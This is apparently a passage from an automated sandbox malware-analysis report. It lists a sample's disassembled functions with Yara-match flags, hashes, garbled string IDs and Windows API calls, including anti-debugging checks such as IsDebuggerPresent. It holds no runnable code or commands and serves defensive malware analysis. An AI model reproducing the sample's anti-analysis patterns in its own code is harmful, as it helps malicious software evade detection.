                    • Instruction ID: f8217922c7bacf8ebbfeb13f92c6951cbec0f44e983773b4e059446c9adb6132
                    • Opcode Fuzzy Hash: 12406312f79cfc89fa1ff026b9006e9479cb960c914d1c568c1c4cd2bcb1dafc
                    • Instruction Fuzzy Hash: DBB249F3A082149FE3046E2DEC4567AFBEAEFD4720F1A453DEAC4C3744EA7558058692
                    Function 005E4E3C Relevance: 6.6, Strings: 4, Instructions: 1622COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: 3ls$d~?$k~o$?w
                    • API String ID: 0-3332638578
                    • Opcode ID: f4d99b3f20039f576654e02166e551df6a0cb7d91120f46cc344ec541debc090
                    • Instruction ID: 72aa684079d14f332a87d903c6ee37ea6236e0bc24cd0f77ccdacb065fcfd147
                    • Opcode Fuzzy Hash: f4d99b3f20039f576654e02166e551df6a0cb7d91120f46cc344ec541debc090
                    • Instruction Fuzzy Hash: 61B207F3A0C6049FE3046E2DEC8567ABBE9EF94360F1A493DE6C4C7744E93598018697
                    Function 005DFDBE Relevance: 6.6, Strings: 4, Instructions: 1597COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: 0a~$V-{$`_$&9
                    • API String ID: 0-206834471
                    • Opcode ID: 341dd9a8f07342429fba5594d5ce52745aa20e4d583540084d68bcc3a6b14ea2
                    • Instruction ID: da2a8b3af6208d4fa3e55b34b048d5161070769707f5485453acec5f56707fef
                    • Opcode Fuzzy Hash: 341dd9a8f07342429fba5594d5ce52745aa20e4d583540084d68bcc3a6b14ea2
                    • Instruction Fuzzy Hash: B4B2D4F350C2009FE704AE2DEC8567ABBE9EF94720F16893DEAC4C3744EA3558458697
                    Function 00410940 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                    • Instruction ID: 78ffdd1b1e8fbf681df67024148688f8aa54f57810aac3ba8850cddb3c6bfb2a
                    • Opcode Fuzzy Hash: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                    • Instruction Fuzzy Hash: 87024D71E002199BDF14CFA9D9806EEBBB1FF48314F24826AE519E7340D775A981CB94
                    Function 04960BA7 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                    • Instruction ID: 5870f6e88b346de3dd458830fb0bab3246a4d891899ac372411a492dd1262dbd
                    • Opcode Fuzzy Hash: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                    • Instruction Fuzzy Hash: B9022D71E012199FDF14CFA8D9D0AAEBBB5FF48314F248269D91AEB340D731A941CB90
                    Function 0040A58A Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                    Download Yara Rule
                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 0040A596
                    • IsDebuggerPresent.KERNEL32 ref: 0040A662
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040A682
                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0040A68C
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                    • String ID:
                    • API String ID: 254469556-0
                    • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                    • Instruction ID: e2fd69841e347503e8527ce1becac27b78df2bbd7224e42b4cf7edbda655d181
                    • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                    • Instruction Fuzzy Hash: 04313A75D4131CDBDB10DFA5D989BCDBBB8BF08304F1080AAE408A7290EB759E858F49
                    Function 0495A7F1 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                    Download Yara Rule
                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 0495A7FD
                    • IsDebuggerPresent.KERNEL32 ref: 0495A8C9
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0495A8E9
                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0495A8F3
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                    • String ID:
                    • API String ID: 254469556-0
                    • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                    • Instruction ID: d80dbb66706cfd000b64b7993774e351344232ebf29181e0be46c47f672497d0
                    • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                    • Instruction Fuzzy Hash: 9931E975D0521DDBDB10DFA4D9497CCBBB8BF08304F2041AAE509A7250EB715A858F49
                    Function 0040CDE3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0040CEDB
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040CEE5
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0040CEF2
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    • String ID:
                    • API String ID: 3906539128-0
                    • Opcode ID: e436a8829045c153a86cd1f8a8b118e982bc3228d08815e2757f6e40e94fe856
                    • Instruction ID: c8210cab332152a7f303cacbc0cae8b9100ca1fc91568f2564f16f954c9570b7
                    • Opcode Fuzzy Hash: e436a8829045c153a86cd1f8a8b118e982bc3228d08815e2757f6e40e94fe856
                    • Instruction Fuzzy Hash: 3331D574941218EBCB21DF65D8897CDBBB4BF08314F5082EAE81CA7291E7749F858F49
                    Function 0495D04A Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,04952AA0), ref: 0495D142
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,04952AA0), ref: 0495D14C
                    • UnhandledExceptionFilter.KERNEL32(0495277A,?,?,?,?,?,04952AA0), ref: 0495D159
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    • String ID:
                    • API String ID: 3906539128-0
                    • Opcode ID: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                    • Instruction ID: c2750cbfe8e65d27d420d393e087f44d5dc05252f40ce80360e105cbb7549b49
                    • Opcode Fuzzy Hash: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                    • Instruction Fuzzy Hash: 1C31CA749012289BCB21DF64DC897CCB7B8BF48310F6081EAE80CA7260E7709F858F44
                    Function 0495092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: .$GetProcAddress.$l
                    • API String ID: 0-2784972518
                    • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                    • Instruction ID: dda99c21e20aebc667b716420b59f138b9c13632cd9a7e34b5f863dc2035b6ef
                    • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                    • Instruction Fuzzy Hash: F1315CB6900609DFDB10CF99C880AADBBF9FF48324F24445AD941A7324D771FA45CBA4
                    Function 005DCE53 Relevance: 3.7, Strings: 2, Instructions: 1185COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: ;w$1
                    • API String ID: 0-108674526
                    • Opcode ID: 3874811a65247e7d34884d56ab4ce35eca912a81577f5a4d6a56dfc25c6f3f00
                    • Instruction ID: 26c08f444f8588f85b53b2250f92c420ee66300784c86592664296fe51d632c1
                    • Opcode Fuzzy Hash: 3874811a65247e7d34884d56ab4ce35eca912a81577f5a4d6a56dfc25c6f3f00
                    • Instruction Fuzzy Hash: 8682F7F36082049FE704AE2DEC8567AB7E9EF94720F1A893DE6C4C7744E63598018797
                    Function 00410822 Relevance: 3.0, APIs: 2, Instructions: 44timeCOMMON
                    Download Yara Rule
                    APIs
                    • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,73BDA22C), ref: 00410837
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID:
                    • API String ID: 1518329722-0
                    • Opcode ID: e180163b605ce24ec50b538605d54e7015c692564284d471828b5f4d87c2059b
                    • Instruction ID: 1c50189d93918816d196ec70bd43d3640a511bc00310eef3747ee1678f9f3f9c
                    • Opcode Fuzzy Hash: e180163b605ce24ec50b538605d54e7015c692564284d471828b5f4d87c2059b
                    • Instruction Fuzzy Hash: 09F0F9B1E002147B8724AF6EC8049DFBEE9EEC5770725465AE809D3340D5B4CD8182D4
                    Function 00473403 Relevance: 2.9, Strings: 2, Instructions: 352COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: fL7\$v<$
                    • API String ID: 0-2707060157
                    • Opcode ID: f8dedf35010372872426d5024d7ea2a25893735c50a06fc81145123572ac7d07
                    • Instruction ID: db780dbcbae02cc774bbb627e0ade9812e5844f189ba0ed455342c5d2533001e
                    • Opcode Fuzzy Hash: f8dedf35010372872426d5024d7ea2a25893735c50a06fc81145123572ac7d07
                    • Instruction Fuzzy Hash: 18B120F3F155244BF3045928DC68376BA96DBE4320F2B823D9E89A73C5E87E5C0A4385
                    Function 0041572E Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00415729,?,?,00000008,?,?,0041C68A,00000000), ref: 0041595B
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionRaise
                    • String ID:
                    • API String ID: 3997070919-0
                    • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                    • Instruction ID: 6715a78ad53a010e1f654acf6738d2326510568a7b3af97ced4f43bd22a978ec
                    • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                    • Instruction Fuzzy Hash: 02B17E71520A08DFD714CF28C486BE57BE0FF85364F298659E899CF2A1C339D992CB45
                    Function 04965995 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04965990,?,?,00000008,?,?,0496C8F1,00000000), ref: 04965BC2
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionRaise
                    • String ID:
                    • API String ID: 3997070919-0
                    • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                    • Instruction ID: 37b66c8a5b174f84119a405ac626fca93bf80b2d5222919d4895e9e067cff068
                    • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                    • Instruction Fuzzy Hash: 95B14C31610609EFD715CF28D48AB657BE5FF45364F2A8668E89ACF2A1C335E981CB40
                    Function 0040A2EC Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                    Download Yara Rule
                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040A302
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: FeaturePresentProcessor
                    • String ID:
                    • API String ID: 2325560087-0
                    • Opcode ID: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                    • Instruction ID: 655f466d2002f1984def2d585099db1cc9528c498776e59a8b59a497753dfce5
                    • Opcode Fuzzy Hash: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                    • Instruction Fuzzy Hash: 4C5136B1E10315CFDB24CF95D8857AABBF0FB48314F24803AD905EB3A1D37899568B99
                    Function 0047389F Relevance: 1.6, Strings: 1, Instructions: 345COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: v<$
                    • API String ID: 0-886278330
                    • Opcode ID: 19bc08acd7d28a0be8f05b8474ca366c08e2a8aba44e896ddc8ca298ab951423
                    • Instruction ID: 4431215af7ce5e5fb1c8159ca28c46b157777210fce38e70d80fd920e910dc3a
                    • Opcode Fuzzy Hash: 19bc08acd7d28a0be8f05b8474ca366c08e2a8aba44e896ddc8ca298ab951423
                    • Instruction Fuzzy Hash: 63B1F0B3F155244BF3045929DC68776BA96DBE0320F2B823D9E89A73C5D87E5C0A4285
                    Function 0040EF09 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0
                    • API String ID: 0-4108050209
                    • Opcode ID: 8470d482166b29df0f0bdf2b707670bb0d2149d7074c5d4c6b8b9bc3646ec2c9
                    • Instruction ID: a862614980e7782cfb360a41e62bb903fc37a91afa162c473b4857922a947482
                    • Opcode Fuzzy Hash: 8470d482166b29df0f0bdf2b707670bb0d2149d7074c5d4c6b8b9bc3646ec2c9
                    • Instruction Fuzzy Hash: DDC1EE309006079ECB34CE69C584A7BBBB1AB45304F144A7FD856B7BD2C339AD0ACB59
                    Function 0495F170 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0
                    • API String ID: 0-4108050209
                    • Opcode ID: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                    • Instruction ID: c95cf3e44fa5be73fa5546c9f640b65e0a252bf705298eeb8bd518642b659b28
                    • Opcode Fuzzy Hash: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                    • Instruction Fuzzy Hash: 44C1F1746006068FDB24DF68C584A7ABBBABF85324F344A39DC529B6B8D330B945CB11
                    Function 0040EBC7 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0
                    • API String ID: 0-4108050209
                    • Opcode ID: 0c5b649a34a28a7901ced7402a87d0ab1891e4bc7ca1eda254f1c36e1c86cddc
                    • Instruction ID: c83ad001e3c04e1f23fe5313526111bf351830610e2bf169758c16327f184a9c
                    • Opcode Fuzzy Hash: 0c5b649a34a28a7901ced7402a87d0ab1891e4bc7ca1eda254f1c36e1c86cddc
                    • Instruction Fuzzy Hash: 3EB1E47090460B8BDB248E6AC555ABFB7A1AF41304F140E3FD452B77C1C73EAD268B89
                    Function 0495EE2E Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0
                    • API String ID: 0-4108050209
                    • Opcode ID: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                    • Instruction ID: edf423b0465f1d23475e2251ffc5719d895b757c228e9e29fdb9d76060ca5e65
                    • Opcode Fuzzy Hash: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                    • Instruction Fuzzy Hash: 6CB1E570A0460A8BDF24DF68C958ABEB7A9EF44314F34063DDC52976B4DB32B605CB51
                    Function 0040A720 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                    Download Yara Rule
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(Function_0000A72C,0040A0A4), ref: 0040A725
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                    • Instruction ID: 2e9130e8fabf2091f020550841097bdee3684dee1eb7d8ffdadd4873c3d8fa43
                    • Opcode Fuzzy Hash: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                    • Instruction Fuzzy Hash:
                    Function 0495A987 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                    Download Yara Rule
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(0040A72C,0495A30B), ref: 0495A98C
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                    • Instruction ID: 2e9130e8fabf2091f020550841097bdee3684dee1eb7d8ffdadd4873c3d8fa43
                    • Opcode Fuzzy Hash: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                    • Instruction Fuzzy Hash:
                    Function 004CAA28 Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: F
                    • API String ID: 0-1304234792
                    • Opcode ID: d3f9bbbef49f457496a5eb7220fb80fcac0c0ce233f7d966a3f3981da193df12
                    • Instruction ID: dbd6c139b32866210b096a28a816bf10a6ce8a84abce6eefe7beafa0d268f343
                    • Opcode Fuzzy Hash: d3f9bbbef49f457496a5eb7220fb80fcac0c0ce233f7d966a3f3981da193df12
                    • Instruction Fuzzy Hash: 6251F4B3F112254BF3504E38CC543617693DB99325F3E827C8A189B7D9DA7E5C4A8384
                    Function 00418592 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: HeapProcess
                    • String ID:
                    • API String ID: 54951025-0
                    • Opcode ID: 7769912fe868597113bc2185a5bbbb46458ecd65f2a9e081601031a621f49aa8
                    • Instruction ID: 3c2d4b823819c0ef79fadcf046fefbcb2a87197a19d2065c9f8a0fe70da1ab12
                    • Opcode Fuzzy Hash: 7769912fe868597113bc2185a5bbbb46458ecd65f2a9e081601031a621f49aa8
                    • Instruction Fuzzy Hash: 80A02230B00200CF83208F32EE0830C3EF8FB8C2C0300C038A000C0232EB3880828B08
                    Function 00415E59 Relevance: .6, Instructions: 637COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                    • Instruction ID: 2119cb9e33fec53289003fbb8559c0bd9e138a5c3f232e450aa7d4159409e329
                    • Opcode Fuzzy Hash: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                    • Instruction Fuzzy Hash: 91320331E29F014DD7239A34D922336A649AFB73D4F56D737E819B5AA9EF28C4C34108
                    Function 005CB6D5 Relevance: .2, Instructions: 204COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a75f97766c45e66a0b66a70d73656ed0e602064f891330c7fd0213bd175e3bc8
                    • Instruction ID: 885c4469d014df6c7757d4f2505356eb08d9732e4303c17f48b9bc268dcdecd2
                    • Opcode Fuzzy Hash: a75f97766c45e66a0b66a70d73656ed0e602064f891330c7fd0213bd175e3bc8
                    • Instruction Fuzzy Hash: BC5107F39187049FF300AE28DC8576BB7D6EB98320F1B463CEAD497784DA3858058796
                    Function 004A2702 Relevance: .2, Instructions: 199COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7b67daa46d0d8681e244ce9ec364437f02626930302321754f7114ee15dda274
                    • Instruction ID: 6d5bdddc093de907d5141f8de640c428d08ab17739a8e91388ea38c82af7e7f1
                    • Opcode Fuzzy Hash: 7b67daa46d0d8681e244ce9ec364437f02626930302321754f7114ee15dda274
                    • Instruction Fuzzy Hash: 665118F3A0C6049FE3506E1DDC8576ABBD6EBD4320F2B493DDAC497745E63558018682
                    Function 0054828B Relevance: .2, Instructions: 186COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dbc02d151a17d9ba7cb71315f529ac408a8e24f3016a08a5def29229a22e1b34
                    • Instruction ID: 078b44d9f28eccabe59eab6eea0bf25df57e27ba9d63e85483898e5ae6b0b042
                    • Opcode Fuzzy Hash: dbc02d151a17d9ba7cb71315f529ac408a8e24f3016a08a5def29229a22e1b34
                    • Instruction Fuzzy Hash: 78515AF3E48218ABE3005D39DD44776BBD5DB90360F1B863DEE88A7B84E93A580446C2
                    Function 00480C4B Relevance: .2, Instructions: 180COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 30426a83901797fedcdeebba221aaf85410923300e17f338ef93c4b1ef865551
                    • Instruction ID: 03ff96d96e193190bde4a6d85ad41127784d7488d5bf054fb6a4a69d4263f895
                    • Opcode Fuzzy Hash: 30426a83901797fedcdeebba221aaf85410923300e17f338ef93c4b1ef865551
                    • Instruction Fuzzy Hash: 885106F3E482149BF3102929EC457BABBD6DB90324F1B453DDB9893780D97E4C0646C6
                    Function 0050C9D4 Relevance: .2, Instructions: 178COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9c07e47112c8b6f5cabd9c025e67e0ac0921ced310a35a996d91162bdf65d7e6
                    • Instruction ID: 46583ba4d93d441b407ff36689c94ccf39daefd5dcdc00afec575cadef95212d
                    • Opcode Fuzzy Hash: 9c07e47112c8b6f5cabd9c025e67e0ac0921ced310a35a996d91162bdf65d7e6
                    • Instruction Fuzzy Hash: 7D51E7F3A091109FE7046E2DDC4576AFAE7EBD8320F2B853DDAC493344E93958158786
                    Function 00552E31 Relevance: .2, Instructions: 176COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
